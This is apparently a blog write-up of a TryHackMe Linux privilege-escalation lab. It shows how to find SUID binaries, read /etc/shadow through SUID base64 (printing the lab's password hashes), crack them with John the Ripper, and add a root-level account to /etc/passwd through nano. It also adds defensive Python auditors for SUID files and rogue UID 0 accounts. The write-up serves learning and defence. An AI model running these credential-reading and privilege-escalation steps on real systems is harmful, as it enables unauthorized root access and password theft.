Exploring SUID Exploit - Linux Privilege Escalation

What is SUID?

To understand SUID, we first have to introduce the basic permissions: Read (r), Write (w), and Execute (x).

SUID stands for “Set owner User ID”, also known as the SUID permission. In the output of `ls -al`, it is denoted by an "s" in the owner's execute position of the permission string.
For example: `-rwsr-xr-x`

This permission is special and isn’t one of the basic permissions. SUID allows a file to run with temporarily elevated permissions: while it executes, the process has the permissions of the file's owner rather than those of the user who launched it.
For example:


From the picture above, we can see that /bin/nano has the SUID bit set (`-rwsr-xr-x`). This means that whenever nano is run, it runs with root privileges, so we don't even need to run it with sudo. This allows an attacker to briefly escalate their privileges. This is awesome, but how can we find files, programs and commands that have the SUID bit set? We can use this command: `find / -type f -perm -04000 -ls 2>/dev/null` (`-perm -04000` matches any file whose mode includes the SUID bit, and `2>/dev/null` hides the permission-denied errors from directories we cannot read).

“A good practice would be to compare executables on this list with GTFOBins (https://gtfobins.github.io). Clicking on the SUID button will filter binaries known to be exploitable when the SUID bit is set (you can also use this link for a pre-filtered list https://gtfobins.github.io/#+suid).” - TryHackMe

If you’re having trouble understanding SUID, I have a diagram to help you understand:


However, the main goal of this exploit is to find a way to **escalate our privilege permanently**. In the case of nano, we can either try to brute-force a user's password or add an account to /etc/passwd and give the account we created root access.

Let's explore the option of brute forcing a user. I will be using the [TryHackMe Linux Privilege Escalation Room](https://tryhackme.com/room/linprivesc)

The first thing I'm going to do is find any commands that have the SUID bit set. I'm going to execute this command: `find / -type f -perm -04000 -ls 2>/dev/null`. Here are the results:

There were more files above this, but I only included the part I found helpful. Now I will go to [GTFOBins](https://gtfobins.github.io/) and focus only on SUID: click the SUID button and it will filter the list down to binaries that are exploitable when the SUID bit is set. Now we are going to compare our results with GTFOBins and see if there is any binary we can use.
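A defender-side audit of the same `find -ls` output, added here as an example that is not part of the original post or the TryHackMe room: it decodes the permission string (where the `s` sits and which numeric mode it corresponds to) and flags SUID binaries that are missing from an assumed baseline, which is how a SUID `/bin/nano` or `/usr/bin/base64` would be caught on a host. The sample output and the baseline set are constructed.

```python
import re
import stat

# Constructed sample of `find / -type f -perm -04000 -ls 2>/dev/null` output
# (not taken from the page's lab machine).
SAMPLE_FIND_LS = """\
  1048601     40 -rwsr-xr-x   1 root     root        40152 Jan 27  2020 /usr/bin/newgrp
  1048702     68 -rwsr-xr-x   1 root     root        68208 Jan 27  2020 /usr/bin/passwd
  1052001    248 -rwsr-xr-x   1 root     root       245584 Feb 19  2020 /bin/nano
  1052120     40 -rwsr-xr-x   1 root     root        39576 Sep  5  2019 /usr/bin/base64
  1048850     56 -rwsr-sr-x   1 root     root        55528 Jan 31  2020 /usr/bin/mount
"""

# Assumed baseline of SUID binaries a stock install needs (derive it from a known-good image).
BASELINE = {"/usr/bin/newgrp", "/usr/bin/passwd", "/usr/bin/mount",
            "/usr/bin/su", "/usr/bin/sudo"}

# find -ls fields: inode, blocks, perms (10 chars + optional ACL marker), links, owner, group, size, date (3 fields), path
LS_LINE = re.compile(r"^\s*\d+\s+\d+\s+(\S{10})\S?\s+\d+\s+(\S+)\s+(\S+)\s+\d+"
                     r"\s+\S+\s+\S+\s+\S+\s+(.+)$")


def mode_from_string(perm):
    """'-rwsr-xr-x' -> 0o4755. The 's' sits in the owner execute slot: lower-case
    means SUID plus execute, upper-case 'S' means SUID without execute."""
    mode = 0
    for i, ch in enumerate(perm[1:10]):
        if ch in "rwxst":          # upper-case S/T carry no execute bit
            mode |= 1 << (8 - i)
    if perm[3] in "sS":
        mode |= stat.S_ISUID        # 0o4000, the bit `-perm -04000` searches for
    if perm[6] in "sS":
        mode |= stat.S_ISGID
    if perm[9] in "tT":
        mode |= stat.S_ISVTX
    return mode


def audit_suid(find_ls_output, baseline):
    """Return SUID files that are not on the baseline, with owner, group and mode."""
    findings = []
    for line in find_ls_output.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue
        perm, owner, group, path = m.groups()
        mode = mode_from_string(perm)
        if mode & stat.S_ISUID and path not in baseline:
            findings.append({"path": path, "owner": owner,
                             "group": group, "mode": oct(mode)})
    return findings
```

Running `audit_suid(SAMPLE_FIND_LS, BASELINE)` on the sample reports /bin/nano and /usr/bin/base64, both root-owned with mode 0o4755.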

I chose `/usr/bin/base64`. The [base64 page](https://gtfobins.github.io/gtfobins/base64/#suid) shows the proof of concept for the SUID case. Now I'm going to check whether I can read `/etc/shadow` using base64.

This is the command I'm going to run: `base64 /etc/shadow | base64 --decode`

```
$ base64 /etc/shadow | base64 --decode
gerryconway:$6$vgzgxM3ybTlB.wkV$48YDY7qQnp4purOJ19mxfMOwKt.H2LaWKPu0zKlWKaUMG1N7weVzqobp65RxlMIZ/NirxeZdOJMEOp3ofE.RT/:18796:0:99999:7:::
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:18796:0:99999:7:::
lxd:!:18796::::::
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:18796:0:99999:7:::
```

As we can see above, we were able to read the contents of the shadow file.

Questions

I wanted to point out that TryHackMe provides some questions for this section:

Which user shares the name of a great comic book writer?
To find the answer, run `base64 /etc/passwd | base64 --decode` and go through all the user names.

What is the password of user2?
We have to build a list of users (from passwd) and a list of password hashes (from shadow) and combine them with unshadow to create a file we can brute-force.

Execute `base64 /etc/passwd | base64 --decode` and save the output to a passwd.txt file.


Do the same for /etc/shadow, but save that output to shadow.txt.

Afterward, run `unshadow passwd.txt shadow.txt > target.txt`, then start brute-forcing the hashes with John the Ripper.
Command: `john --wordlist=/usr/share/wordlists/rockyou.txt target.txt`

Here is the result:

We were able to crack the passwords of user2 and gerryconway.

What is the content of the flag3.txt file?
flag3 is in /home/ubuntu. All we have to do is run `base64 /home/ubuntu/flag3.txt | base64 --decode`.

The flag is `THM-3847834`

Adding a user to escalate privilege

Since nano has the SUID bit set, giving us the ability to read and write files with root privileges, we can edit the /etc/passwd file to create a user and give it root privileges.

Note: All of the material below is from TryHackMe Linux Privilege escalation

We will need the hash of the password we want the new user to have. This can be generated quickly with the openssl tool on Kali Linux.


We will then add this password hash, together with a username (hacker), to the `/etc/passwd` file.

Once our user is added (note how `root:/bin/bash` was used to provide a root shell), we switch to this user and should hopefully have root privileges.
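A detection check for the kind of /etc/passwd entry this technique produces, added here as an example that is not from TryHackMe or the original post: it parses passwd(5) lines and reports any UID 0 account other than root, any account carrying a hash directly in /etc/passwd instead of /etc/shadow, and empty password fields. The sample file is constructed and the hash in it is a non-working placeholder.

```python
# Constructed /etc/passwd sample; the "hacker" line imitates the entry the
# technique above creates (the hash is a constructed placeholder, not a real one).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
karen:x:1001:1001::/home/karen:/bin/bash
hacker:$1$saltsalt$CONSTRUCTEDnotarealhash0:0:0:root:/root:/bin/bash
"""


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; lines that do not fit the format are returned separately."""
    entries, malformed = [], []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            malformed.append(line)
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries, malformed


def audit_passwd(text):
    """Return (account, reason) pairs a defender should review after a suspected SUID-write abuse."""
    alerts = []
    entries, malformed = parse_passwd(text)
    for line in malformed:
        alerts.append(("<malformed>", "unparseable line: " + line[:40]))
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            alerts.append((e["name"], "UID 0 account that is not root"))
        if e["pw"] == "":
            alerts.append((e["name"], "empty password field (no password required)"))
        elif e["pw"] not in ("x", "*", "!", "!!"):
            # An 'x' means the hash lives in /etc/shadow; anything else is a hash
            # stored in the world-readable passwd file, which is what the technique above relies on.
            alerts.append((e["name"], "password hash stored in /etc/passwd, bypassing /etc/shadow"))
    return alerts
```

On the sample, `audit_passwd(SAMPLE_PASSWD)` returns two alerts for "hacker" and nothing for the legitimate accounts.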

That is all I have, thanks for reading.